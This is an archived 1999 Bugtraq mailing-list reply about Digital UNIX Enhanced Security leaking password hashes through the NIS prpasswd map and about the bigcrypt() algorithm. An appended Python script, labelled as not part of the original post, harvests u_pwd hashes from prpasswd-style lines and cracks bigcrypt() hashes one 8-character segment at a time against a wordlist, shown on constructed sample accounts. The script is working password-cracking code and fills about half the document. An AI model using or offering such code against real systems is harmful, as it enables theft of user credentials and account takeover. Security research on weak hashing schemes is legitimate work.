[9869] in bugtraq
Re: Digital Unix 4 protected password database.
daemon@ATHENA.MIT.EDU (Jon Morgan)
Wed Mar 10 12:03:53 1999
Date: Wed, 10 Mar 1999 09:10:18 -0000
Reply-To: jmorgan@dircon.co.uk
From: Jon Morgan <jmorgan@DIRCON.CO.UK>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.4.03.9903091444100.31400-100000@isn.dac.neu.edu>
> And as noted, you do need root to run the program. But if you
> are root you don't really need it. A simple Perl script or even
> simpler shell script will do. Normally the /tcb/files/ tree is owned
> by auth.auth and not world readable. But, um, if you're root all bets
> are off anyway. You don't actually need the passwords.
The one thing that a lot of people miss with Digital UNIX is that
when you use Enhanced Security in conjunction with NIS, the entire
"protected" password subsystem is available as the NIS map prpasswd.
This contains, amongst other things, the password hash value. Then
your perl or sh script can just harvest these trivially. Why you
want to run a C2 secure system and then use NIS is beyond me, but at
least it gives you nifty password controls...
The one thing that CAN cause problems is that Digital UNIX can use
nonstandard hash algorithms (bigcrypt(), crypt16() and C1crypt()) as
well as the normal crypt(). Not only does this make coding slightly
complicated (as you have to get the correct hash algorithm), but when
a password is created within an Enhanced Security environment that is
over eight characters in length, another password round is created
AFTER the original to contain the rest of the password. This doesn't
make things impossible, just difficult - Digital kindly provide a set
of system calls to do most of this for you.
-jon.
--
Jon Morgan <jmorgan@dirconspam.co.uk>
Speaking for myself. nihil illegitemi carborvndvm
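Added example (not part of Jon's post, and not Digital's own code): a small Python script that harvests u_pwd hashes from prpasswd-style map lines, tells a plain crypt() hash from a bigcrypt() one by length, and then cracks a bigcrypt() hash one eight-character segment at a time. It leans on the system crypt(3) for DES (Python's crypt module where it still exists, libcrypt via ctypes otherwise). The prpasswd line layout ("user:u_name=...:u_id#...:u_pwd=...:chkent:"), the attribute syntax (= string, # number, bare name true, name@ false), the bigcrypt() salt-chaining rule (segment n salted with the first two ciphertext characters of segment n-1) and every user name, password and salt below are assumptions constructed for the example; crypt16() and C1crypt() are not covered.

```python
"""Harvest prpasswd-style u_pwd hashes and attack DEC bigcrypt() per segment.

Everything here is illustrative: the map lines are constructed, and the
bigcrypt() chaining rule is this example's understanding of the algorithm.
"""
import ctypes
import ctypes.util
from typing import Optional

SEG = 8    # cleartext bytes hashed per DES crypt() segment
ESEG = 11  # ciphertext characters a segment contributes after the 2-char salt


def des_crypt(word: str, salt: str) -> str:
    """Traditional 13-character DES crypt(3) of the first 8 bytes of word."""
    try:
        import crypt  # stdlib module, removed in Python 3.13
        result = crypt.crypt(word, salt[:2])
    except ImportError:
        lib = ctypes.CDLL(ctypes.util.find_library("crypt")
                          or ctypes.util.find_library("c"))
        lib.crypt.restype = ctypes.c_char_p
        lib.crypt.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
        raw = lib.crypt(word.encode(), salt[:2].encode())
        result = raw.decode() if raw else None
    if not result or len(result) != 13:
        raise RuntimeError("DES crypt() is not available in this libcrypt")
    return result


def bigcrypt(password: str, salt: str) -> str:
    """bigcrypt(): hash each 8-byte segment on its own and concatenate.

    Segment 0 uses the stored salt; segment n uses the first two ciphertext
    characters of segment n-1 as its salt (assumed chaining rule). The
    result is 13 + 11 * (segments - 1) characters, so <= 8 chars == crypt().
    """
    segments = [password[i:i + SEG] for i in range(0, len(password), SEG)] or [""]
    out = des_crypt(segments[0], salt)
    prev_cipher = out[2:]
    for seg in segments[1:]:
        h = des_crypt(seg, prev_cipher[:2])
        out += h[2:]            # keep the 11 hash chars, drop the repeated salt
        prev_cipher = h[2:]
    return out


def parse_prpasswd(line: str) -> dict:
    """Parse one tcb/prpasswd attribute line (assumed layout, see lead-in)."""
    fields = line.strip().split(":")
    entry = {"user": fields[0]}
    for f in fields[1:]:
        if not f or f == "chkent":          # trailing terminator field
            continue
        if "=" in f:
            k, v = f.split("=", 1)
            entry[k] = v
        elif "#" in f:
            k, v = f.split("#", 1)
            entry[k] = int(v)
        elif f.endswith("@"):
            entry[f[:-1]] = False
        else:
            entry[f] = True
    return entry


def hash_kind(h: Optional[str]) -> str:
    """Classify a u_pwd value by its length: 13 = crypt(), 13+11k = bigcrypt()."""
    if not h or h.startswith("*"):
        return "locked"
    if len(h) == 13:
        return "crypt"
    if len(h) > 13 and (len(h) - 13) % ESEG == 0:
        return "bigcrypt"
    return "unknown"


def harvest(lines) -> dict:
    """Map user -> (hash, kind) from prpasswd map lines, as 'ypcat prpasswd' would feed."""
    return {e["user"]: (e.get("u_pwd", ""), hash_kind(e.get("u_pwd", "")))
            for e in map(parse_prpasswd, lines)}


def crack_bigcrypt(stored: str, pieces) -> Optional[str]:
    """Recover a bigcrypt() password segment by segment.

    Every segment's salt is readable from the stored hash, so each 8-byte
    segment is an independent DES crypt() search: the attacker never has to
    guess the whole >8-character password at once.
    """
    n_segments = 1 + (len(stored) - 13) // ESEG
    salt, recovered = stored[:2], []
    for i in range(n_segments):
        target = stored[2 + i * ESEG: 2 + (i + 1) * ESEG]
        found = next((c for c in pieces
                      if len(c) <= SEG and des_crypt(c, salt)[2:] == target), None)
        if found is None:
            return None
        recovered.append(found)
        salt = target[:2]        # next segment was salted from this ciphertext
    return "".join(recovered)


# Constructed sample map: two users, one with a >8-character password.
SALT = "Xy"
SAMPLE_USERS = {"jon": "Tru64Enhanced!", "ops": "nis4ever"}
# Constructed wordlist of 8-byte pieces (what a segment-wise attack needs).
PIECES = ["password", "hunter2", "nis4ever", "anced!", "Tru64Enh"]


def sample_map():
    return [f"{u}:u_name={u}:u_id#{1000 + i}:u_pwd={bigcrypt(pw, SALT)}"
            f":u_succchg#920000000:u_lock@:chkent:"
            for i, (u, pw) in enumerate(SAMPLE_USERS.items())]


if __name__ == "__main__":
    for user, (h, kind) in harvest(sample_map()).items():
        print(f"{user}: {kind:8} {h} -> {crack_bigcrypt(h, PIECES)!r}")
```

The point the script makes concrete: the first 13 characters of a bigcrypt() value are exactly crypt() of the first eight characters of the password, and each further 11-character chunk is a separately salted crypt() of the next eight, so a 14-character password costs an attacker two 8-character searches, not one 14-character search.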